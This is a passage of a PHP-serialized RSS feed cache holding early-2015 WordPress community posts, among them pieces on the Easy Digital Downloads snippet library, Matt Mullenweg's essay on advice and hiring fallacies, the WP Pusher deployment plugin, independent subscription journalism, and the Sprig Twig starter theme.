add-on plugins) for potential features to add to core.</li>\n</ul>\n<p>The most common way that snippets are added to the EDD library is through the support staff. “We write code snippets for customers while helping with support tickets and then we put the snippet in the library,” Williamson said.</p>\n<p>He hasn’t seen any WordPress-based open source projects or products doing anything similar but thinks that others could gain some value from implementing a library. GenerateWP might be the closest example of a site attempting something similar for snippets that extend WordPress core, with its new user <a href=\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\" target=\"_blank\">code library feature</a>. However, this doesn’t have the collaborative benefits of hosting the library on GitHub.</p>\n<p>Larger WordPress projects like the Pods Framework, Gravity Forms, WooCommerce, BuddyPress, Jetpack, etc., are prime candidates that might benefit from a library of tested snippets. Of course, it helps that the base EDD plugin is free and open source. A 100% commercial project may not fare as well with a crowdsourced snippet library.</p>\n<p>Easy Digital Download is well known for being extensible and developer-friendly. Over the past two years <a href=\"http://wptavern.com/pippin-williamson-on-building-a-community-around-your-open-source-project\" target=\"_blank\">Williamson built a community of contributors</a> 120+ strong and found that extensibility has a direct correlation to profitability. The code snippet library is undoubtedly a valuable investment toward helping developers extend the base EDD plugin.</p>\n<p>Could your open source project or product benefit from a community-maintained library of code snippets? A snippet library can keep developers from having to reinvent the wheel when performing common modifications. It also provides a tested resource of code samples for those who are just getting started extending your project. If Williamson’s experience is any proof, then the few minutes per week spent on a snippets library can pay off with a big boost for the community surrounding your project.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 20:12:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Advice and Fallacies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44648\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/advice-and-fallacies/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5955:\"<p>One of the toughest things in business is when you get well-meaning advice from advisors, investors, or friends of the company who are valuable but might hold some ideas or ways of approaching problems that just aren’t applicable to your particular company or situation. They might be right most of the time, and it might have worked for them in the past to build a huge success, but it doesn’t mean it’s right for you, right now.</p>\n<p>This is especially a struggle for Automattic because so much of what we do is deliberately different from companies that have come before us. The below is a sensitive-info-scrubbed version of a comment I made on an <a href=\"http://p2theme.com/\">internal P2</a> in response to someone who had met with a close friend of the company who had said we should “hire more business people, and more people like <em>so-and-so</em>, who have a background in and passion for data analysis and structure. He also shared his ideas about what the additional business hires could be responsible for, such as P&L responsibilities for specific products.” The person he had talked to was asking why we weren’t following that advice.</p>\n<p>The first part was easy, because <em>so-and-so</em> was actually leading hiring for a position around data and the early results were going well. The rest I ended up writing more about, which follows. It was only meant for internal consumption, so read it as such, but I got enough requests to share the comment publicly that I wanted to clean it up and release it for y’all.</p>\n<blockquote><p>On the “more biz people + P&L” side, it’s an area we disagree.</p>\n<p>We’ve had more “business people” in the past, and found it just didn’t move the needle in the same way that investing on the support, engineering, and design side did. They also tended to generate more meetings and work for other people than was commensurate for their contributions.</p>\n<p>We’ve also experimented with giving leads P&L responsibility for products and groups, but ultimately it was awkward because we don’t really want leads or teams focused on the loss or costs of what they’re doing — we just want to grow our core metrics and revenue in a healthy and accelerating way, and let Ops and myself worry about overall profit or loss for the company, costs of people and services, capital requirements, etc. We’re still at a stage where our primary goals are investing in growth and product excellence, I wouldn’t want a P&L concern to be a distraction from that, and that also takes us into the territory of different teams having “headcounts” of people they can hire for the year, or budgets set ahead of time and that they’ll lose if they don’t use, zero-sum accounting between teams and more balkanization you often see in larger organizations. When anyone thinks about P&L at Automattic, I want it to be holistically and with a long-term view, not for a single team or product.</p>\n<p>It gets backs to the fallacy we talked about and agreed to avoid at the [WordPress.com leads] meetup, which is the business equivalent of <a href=\"http://en.wikipedia.org/wiki/Great_Man_theory\" rel=\"nofollow\">Great Man Theory</a>: the idea that a deficiency in the business or product will be solved by hiring someone senior to be in charge of that thing. Example: Automattic is bad at marketing, we should hire a CMO. (99% of the time when this is suggested it means an external person, because if anyone internal was good the problem wouldn’t exist.) It’s an easy thing for anyone to fall into, you can see it in [a recent internal thread].</p>\n<p>This must work sometimes, because it seems to be a near-universal affliction of VCs on startup boards. It also is a little bit of a <a href=\"http://bikeshed.com/\" rel=\"nofollow\">bikeshed</a>, because while it can be difficult to understand or feel like you can have an influence on something fundamental to the product, like say the signup flow, most VCs have large professional networks and can have long and vigorous discussions talking about potential people who are executives in a given area and their first or second degree connections to them. Of course, like many of us, VCs are consumers of tech media which tends to ascribe all the success of an organization to a single person (like Sheryl Sandberg for Facebook not falling apart, or Adam Bain for revenue at Twitter). However often the problem has root causes more fundamental than a single person could shift.</p>\n<p>I subscribe to a more environment-driven approach, that if you break down a problem into its component parts you can address them individually, often with relatively simple next steps, and build things from the ground up, rather than the top down. If you can’t do that, then it’s best to be candid that the area is not a priority and make sure that’s in line with what you’re focusing on instead. In this process leaders will emerge or if the effort matures to a point where one joins as a new hire he or she will have the resources, groundwork, and environment to succeed.</p></blockquote>\n<p><strong>So in summary: always go back to first principles of decisions.</strong> Hires are seldom panaceas. Someone being successful in a role at another company doesn’t mean they actually did the work, or were the cause of the success. If there’s an area you’re weak, try to figure out the root causes of why you’re weak, and where possible try to improve the environment that creates the problem before pinning the turnaround on a “Jesus hire.” When you improve the environment it makes it much more likely a new external hire will do well. The majority of success or failure is a result of the environment, at least as much as the individuals involved.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 07:57:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WP Pusher Aims to Provide Pain-Free Deployment of WordPress Themes and Plugins from GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6728:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png?resize=680%2C312\" alt=\"wp-pusher\" class=\"aligncenter size-full wp-image-38342\" /></a></p>\n<p>If you create plugins and themes for clients and host them on GitHub, then you may have encountered the hassle of having to move those files over to your client’s installation. On super cheap hosting packages, where SSH access is not an option, this process inevitably requires manually copying files over via FTP.</p>\n<p>This is the problem that Danish developer <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a> aims to solve with his new <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> product. The plugin aims to bring pain-free deployment of WordPress themes and plugins directly from GitHub and Bitbucket.</p>\n<p>“If you happen to be an actual developer, I guess you have a few preferences as to how you manage and deploy your code,” Suhm said. “I’m talking about stuff like version control and automated deployment scripts. Good luck with that on your clients’ cheap-ass shared hosting account.”</p>\n<p>Suhm developed WP Pusher with the vast majority of cheaply-hosted WordPress sites in mind. Additionally, he wanted to eliminate some of the hangups with more expensive hosts. “Even if you are running a shiny new VPS and have SSH access, Git installed and you think all is well, soon you’ll realize other weird things,” he said. “You can’t have symlinks in your /plugins folder just to mention one.” WP Pusher gets around these limitations via a simple plugin that does not require Git or SSH.</p>\n<h3>How Does WP Pusher Work?</h3>\n<p>Once installed, WP Pusher allows you to install and manage all of your GitHub or Bitbucket-hosted plugins in one central dashboard in the admin. Enabling the Push-to-Deploy feature will have your code update itself automatically every time you push to GitHub or Bitbucket.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png?resize=1025%2C202\" alt=\"manage-wp-pusher-themes\" class=\"aligncenter size-full wp-image-38352\" /></a></p>\n<p>The plugin supports private repositories in its free edition and includes support for branches in the <a href=\"https://wppusher.com/#licenses\" target=\"_blank\">Pro version</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png?resize=1025%2C651\" alt=\"wp-pusher-install-plugin\" class=\"aligncenter size-full wp-image-38353\" /></a></p>\n<p>WP Pusher is essentially an extension of the built-in auto updater in WordPress, which Suhm explained in the plugin’s release <a href=\"http://blog.wppusher.com/pain-of-wordpress-development/\" target=\"_blank\">post</a>:</p>\n<blockquote><p>After a lot of prototyping, and hacking around with the WordPress core, we came up with a smart solution. By utilizing the WordPress core upgrader classes, we could solve the problem in a really clean way. </p>\n<p>Since WordPress already knows how to pull stuff from a remote source and install it, we realized that by working together with WordPress, instead of just throwing random automated SSH and FTP scripts at the server, we could just have WordPress do the work for us -with a lot of tweaking of course. In the end, our solution doesn’t do anything that is not native to WordPress. It’s all core functionality.</p></blockquote>\n<p>WP Pusher does everything in the plugin and does not require shell access. It communicates with GitHub via a token stored on your server and operates using WordPress’ core updater capabilities.</p>\n<h3>Different Approaches to Managing WordPress Projects with Git</h3>\n<p>In order to use WP Pusher, each GitHub-hosted plugin and/or theme will need to be in its own repository. While beta testing WP Pusher, Suhm found that developers have <a href=\"http://blog.wppusher.com/managing-wordpress-projects-with-git/\" target=\"_blank\">differences in how they manage WordPress projects with Git</a>. The most common one he’s encountered is <em>one installation, one repository</em>, where the entire WordPress installation, including themes and plugins, is under Git control. Suhm believes that this approach is fundamentally broken, given that it requires you to keep a lot of 3rd party code under version control.</p>\n<p>WP Pusher operates under a “<em>one package, one repository</em>” approach where each theme or plugin is its own entity. This method also offers the advantage of being able to share theme/plugin code across multiple projects.</p>\n<p>“WordPress relies heavily on the auto updater, which would make your version control a mess,” Suhm explained. “If you do have something that is more enterprise than most WordPress setups, you should consider a custom setup that allows better for version control of core. Packages should still, in my opinion, each have their own repositories, since they are logically their own entities.”</p>\n<p>WP Pusher is structured around this approach for managing WordPress projects with Git. You may need to restructure some of your repositories if you want to be able to use the plugin.</p>\n<p>The free version offers unlimited themes and plugins, unlimited repositories, and support for both GitHub and Bitbucket. It does not, however, include email support. WP Pusher is compatible with WordPress multisite and will show up in the network admin when activated. It doesn’t currently support Composer but Suhm is <a href=\"https://twitter.com/WP_Pusher/status/558356082960371713\" target=\"_blank\">considering adding it in the future</a>. The plugin is released under the GPLv2 license.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> offers a unique take on maintaining version control for projects while not forcing WordPress to bend over backwards to provide it in the admin. It leaves the version control to GitHub and/or Bitbucket and uses WordPress simply for deployment.</p>\n<p>Setup is simple and the plugin will work virtually everywhere, even on the cheapest hosting. If you like the idea of maintaining version control on a plugin/theme basis, you can download the WP Pusher plugin for free from the project’s <a href=\"https://wppusher.com/\" target=\"_blank\">website</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:32:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Post Status: New journalism\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8311\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://poststatus.com/new-journalism/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13584:\"<p>Have you heard of Andrew Sullivan? He’s the man behind The Dish — a blog that helped break new ground on blog monetization through membership fees.</p>\n<p><a href=\"http://dish.andrewsullivan.com/2015/01/31/a-note-to-my-readers/\">He quit blogging</a>, and therefore the media world declared blogging dead (again). Sullivan leaving and the posts that have come from it have caused me to think about blogging and journalism in its current and changing state. I think we’re in the second act of what I’m pompously calling <em>new journalism</em>.</p>\n<h3>Blogging is so (not) dead</h3>\n<p>Seemingly everyone in media weighed in on Sullivan’s departure, from <a href=\"http://www.buzzfeed.com/bensmith/this-is-my-blog\">Ben Smith</a> at Buzzfeed to <a href=\"http://www.vox.com/2015/1/30/7948091/andrew-sullivan-leaving-blogging\">Ezra Klein</a> at Vox. My favorite (until today) was Mathew Ingram’s <a href=\"https://gigaom.com/2015/01/31/blogging-is-very-much-alive-we-just-call-it-something-else-now/\">take at Gigaom</a>, which mostly defended the blog.</p>\n<p>But the best of the bunch goes to former Automattician and current independent tech journalist Ben Thompson. Ben runs <a href=\"http://stratechery.com/\">Stratechery</a>, a blog that has a very similar model to The Dish (and my own), where he makes money from subscribers who get extra members-only content.</p>\n<p>I have followed Ben’s work closely. I was quite keen to see how his model would work for him, and it has. Nevertheless, I almost fully agree with Ben’s take on what Sullivan’s model and departure mean:</p>\n<blockquote><p>It turns out, though, that there are more business models than simply advertising, as Sullivan himself sought to show. Sullivan was, for the last two years, supported by reader subscriptions to the tune of <a href=\"https://gigaom.com/2014/10/10/andrew-sullivans-daily-dish-sees-new-signups-fall-but-revenue-holding-steady-at-about-1m/\">nearly one million dollars a year</a>, and while many were skeptical of Sullivan’s efforts when he started, his ability to raise money shouldn’t have been a surprise: his is a singular voice – to put it in economic terms, Sullivan’s writing had a low <a href=\"http://en.wikipedia.org/wiki/Elasticity_of_substitution\">elasticity of substitution</a> – so people were happy to pay for something they couldn’t get anywhere else.</p></blockquote>\n<p>Elasticity of substitution may be my new favorite phrase. And in that concept, I think we find the important key to viability. What are we valuing in websites? For me, it’s individual voices.</p>\n<p>A bit more from Ben’s post:</p>\n<blockquote><p>But Sullivan did have a viable business, and it scaled wonderfully: it cost him the same amount of both time and money to serve 1,000 subscribers as it would have to serve 100,000, or 1 million, and he didn’t need to change a thing about himself or his content to do it. No, it’s not scale that is the problem, but rather <em>reach.</em></p>\n<p>I am, of course, acutely aware that there is a tradeoff when it comes to the subscription business model: by making something scarce, and worth paying for, you are by definition limiting your number of readers.<span> </span>Stratechery, though, serves a niche, and <a href=\"http://stratechery.com/2015/niches-problem-subscription-services/\">niches are best served</a> by making more from customers who really care than from milking pennies from everyone.</p></blockquote>\n<p>For a writer, it is a difficult mind-shift to focus on subscribers after years of focusing on reach. But I do think a subscriber model, or more likely a hybrid subscriber model, is perhaps one of the most viable routes for sustainable journalism that we have today.</p>\n<h3>New blogging mediums</h3>\n<p>Of additional interest to all of these “blogging is dead” posts, is how the writers define blogs and the mediums for them.</p>\n<p>Ben really narrows the definition of a blog.</p>\n<blockquote><p>A big problem with this entire discussion is that there really isn’t a widely agreed-upon definition of what a blog is, thanks in part to the rise of sites like TechCrunch that ran on WordPress and presented posts in reverse-chronological order and so, at least in the beginning, were called “blogs”; add to that the thinly-disguised PR-channels known as “company blogs” and it’s easy to get confused.</p>\n<p>And so, to be clear, when I speak of the “blog” I am referring to a regularly-updated site that is owned-and-operated by an individual (there is, of course, the “group blog,” but it too has a clearly-defined set of authors). And there, in that definition, is the reason why, despite the great unbundling, the blog has not and will not die: is is the only communications tool, in contrast to every other social service, that is <em>owned</em> by the author; to say someone follows a blog is to say someone follows a <em>person.</em></p></blockquote>\n<p>This is probably the single argument I (partially) disagree with. I actually believe that a blog is just that: <em>a web log</em>. I think it’s perfectly fine to consider Twitter, Facebook, & Instagram new mediums for blogging — at least in the sense of the traditional <em>web log</em> definition. They are just for a different form of blogging: short form, temporary, and a viable replacement for the “10 to 15″ daily update style of posts many old school bloggers previously put on their primary “blogs”.</p>\n<p>Other than someone abusing these mediums — for instance, Marc Andreessen’s tweet-storms — our WordPress (or other software) blogs are still where our more permanent thoughts go. And fortunately, as Ben notes, we have these short-form mediums as free marketing channels for our actual blogs and more serious thoughts.</p>\n<p>Ben also hesitates to consider multi-author sites as blogs. I disagree here as well. Perhaps publications aren’t blogs as a whole, but within TechCrunch or The New York Times, individuals rise up with their own unique voices, and those singular feeds are, in my opinion, blogs of their own — whether or not they are fully siloed within the publication. I can follow an author on Twitter and essentially get their blog feed through their Twitter links, even if the site itself doesn’t differentiate their posts from anyone else’s.</p>\n<p>So Ben has helped me establish a new mental constraint for defining a blog: <strong>a blog is a highly individual thing</strong>. I have never truly considered this before, but it makes sense. I’ve always been most attracted to publications where the voice behind the writing is strong — where I know who is writing a post whether I see the byline or not.</p>\n<h3>Publishing containers</h3>\n<p>The New York Times, TechCrunch, Politico and BuzzFeed: these are containers. They may have some over-arching styles that most of their writers follow, but we still get to know individuals in these publications. I know David Carr’s voice at The New York Times; I know Alexia Tsotsis’ voice at TechCrunch; I know Mike Allen’s voice at Politico; and I know Ben Smith’s voice at BuzzFeed.</p>\n<p>One thing we’ve seen happen in a wake of <em>new journalism</em> is that a voice gets too big for the container, and the voice splits. Nate Silver left The New York Times. Ezra Klein left The Washington Post. Interestingly, I think both of these guys lost their voices a bit when they created their own containers.</p>\n<p>Andrew Sullivan is a great example of a big voice within publishing containers. Before he went independent, he was a huge voice at The Atlantic and The Daily Beast. He was apparently responsible for <a href=\"http://www.forbes.com/sites/jeffbercovici/2011/05/03/losing-andrew-sullivan-didnt-hurt-the-atlantics-traffic/\">up to a quarter</a> of all traffic to The Atlantic before he left.</p>\n<p>For a publisher, this should be both exhilarating and terrifying. The voice within your publication (Sullivan) gets outstanding results, but you also run the risk of the voice leaving; if the voice is bigger than the container, that could be really really bad.</p>\n<h3>We need new tools for a new kind of publishing container</h3>\n<p>Journalists are leaving big publishing containers and going independent for a variety of reasons, but I believe one is pretty clear: money.</p>\n<p>A niche publisher like Ben Thompson can make well into six-figures running his own publication. Ben is a talented and knowledgeable writer, but I don’t think it would be easy for him to make the kind of money he’s making at Stratechery if he were writing for a traditional publication.</p>\n<p>Ben cites the ease of use of tools like WordPress and Stripe as reasons to be optimistic that the independent subscription model can work:</p>\n<blockquote><p>While WordPress has long been an effective free option for managing the content-side of blogging, only recently are there useful tools for managing the business-side. First and foremost amongst these is Stripe which, for the first time makes managing subscription-payments simple and straight-forward. However, there are still holes, particularly when it comes to actually managing membership lists and communities</p></blockquote>\n<p>I agree that it’s easier than before, but I wouldn’t say it’s simple. I’ve spent a great deal of time to make Post Status work behind the scenes, and I don’t think it’s perfect by any means. Is it cheap compared to million dollar big-publisher platforms? Yes. Is it cheap for a solo-journalist? Not at all.</p>\n<p>I think there is a tremendous opportunity here: there is room to create new publishing containers (I’m not sure if this should be a tool or a network) that lower the technical barrier to entry but also enable independent, subscription-based journalism.</p>\n<p>Big media companies remove the need to manage the business and technical side for journalists. Meanwhile, those of us that are attempting our own thing are all reinventing the wheel a bit.</p>\n<p>Ben and I use some of the same tools — WordPress and Stripe — but what if there was a more structured container for those seeking independence and someone to help them take care of the non-content aspects? What if that same tool had its own network effect?</p>\n<h3>Who is in position to be a new kind of container?</h3>\n<p>What existing networks are in position to offer this kind of tool? WordPress.com is one. Medium is another.</p>\n<p>I envision a tool (publishing platform) where independent journalists can do a few things:</p>\n<ul>\n<li>Maintain their own audience (be a part of a network, but be their own voice and publication)</li>\n<li>Own their own brand (custom themes/styles, unique domain)</li>\n<li>Offer subscription options to readers without managing the tech</li>\n</ul>\n<p>If I were Ev Williams or Matt Mullenweg, I’d be working on a way to be the next container for great, <em>sustainable</em> journalism. And hosted networks have a unique advantage: they can offer discovery for new or lesser-known authors. Unless <a href=\"https://poststatus.com/notes/recommendation-engine-independent-wordpress-blogs/\">self-hosted options figure that part out</a>.</p>\n<p>As a publisher on the WordPress.org side of things, I don’t think the perfect tool exists yet either. Fortunately I’m able to build most of what I need. But Ben is right that managing membership lists and communities with WordPress is still hard. Syncing the membership list and the email list (delivery mechanism) is hard too.</p>\n<p>While I don’t think the perfect self-hosted tools exist quite yet, I believe it’s just a matter of time. But even the best self-hosted tool will require that the journalist also manage the business elements; therefore I think there will always be room for a hosted tool.</p>\n<p>I think this could be an excellent business vertical for a publishing tool like <a href=\"http://wordpress.com\">WordPress.com</a> or <a href=\"http://medium.com\">Medium</a>.</p>\n<h3>New journalism</h3>\n<p>I’ve used the words <em>journalism</em> and <em>blogging</em> synonymously throughout this post. I don’t think all bloggers are journalists, but I do think all journalists are bloggers. Blogging isn’t dead. I think it’s just leaving adolescence.</p>\n<p>Journalists won’t need big media to back their efforts. They’ll be able to use a blend of mediums (Twitter, Instagram, Youtube, etc) to funnel traffic to their main “blog” — or primary domain — where they can actually make money by attracting loyal subscribers willing to pay for high-value content.</p>\n<p>The formula for making money will change. The key for successful independent journalism won’t be about being first, or dominating search, or pageview quotas. Too many in big media have ignored that <em>elasticity of substitution</em> measurement Ben highlights.</p>\n<p>Journalism is changing, and I agree with Ben Thompson that “The Daily Dish will in the long run be remembered not as the last of a dying breed but as the pioneer of a new, sustainable journalism.”</p>\n<p>Those journalists that can create what others cannot will have a formula for publishing success, and soon enough the tools will catch up to allow them to do what they do best: create great content.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:21:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Sprig: A WordPress Starter Theme that Features the Twig Templating Engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37053\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/sprig-a-wordpress-starter-theme-that-features-the-twig-templating-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4167:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png\" rel=\"prettyphoto[37053]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png?resize=857%2C390\" alt=\"sprig\" class=\"aligncenter size-full wp-image-38303\" /></a></p>\n<p>Those who are new to WordPress theming are often confused by the mixture of PHP and HTML markup in templates. It’s easy to accidentally break theme functionality when everything is placed in the same file.</p>\n<p>For that reason, there’s a strong contingency of developers who prefer to integrate the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine with WordPress, using a starter theme or via plugins like <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, or the like. Fans of Twig appreciate its concise syntax and find that it makes templates more readable.</p>\n<p><a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> is a new Twig-based starter theme for WordPress created by developer <a href=\"http://zach-adams.com/\" target=\"_blank\">Zach Adams</a>. The theme incorporates the power and flexibility of Twig templating to speed up development and make WordPress templates easier to edit.</p>\n<p>Here’s an example of what the WordPress loop looks like in Sprig:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">{% for post in posts() %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>For those who have never worked with a templating engine, the syntax may look rather unfamiliar, but the advantage is that it allows you to separate the necessities of getting/manipulating your data and rendering it out. Below is an example of the WordPress loop with arguments:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\n{% for post in posts({\n \'post_type\':\'post\',\n \'posts_per_page\':4\n}) %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p> </p>\n<h5>Sprig Features</h5>\n<p>Sprig utilizes Bower for frontend package management. It comes pre-loaded with either <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">Bootstrap</a> or <a href=\"https://github.com/zach-adams/sprig-foundation\" target=\"_blank\">Foundation</a> to get started. Sprig uses <a href=\"http://gulpjs.com/\" target=\"_blank\">Gulp</a> to automate tasks such as compiling, concatenating, and minifying CSS and Javascript.</p>\n<p>The theme was developed using the best parts of <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a>, <a href=\"http://roots.io/starter-theme/\" target=\"_blank\">Roots</a>, and <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, which bring in a number of additional functions and scripts useful for theme development.</p>\n<h3>Does Twig Introduce a New Layer of Abstraction?</h3>\n<p>The main argument 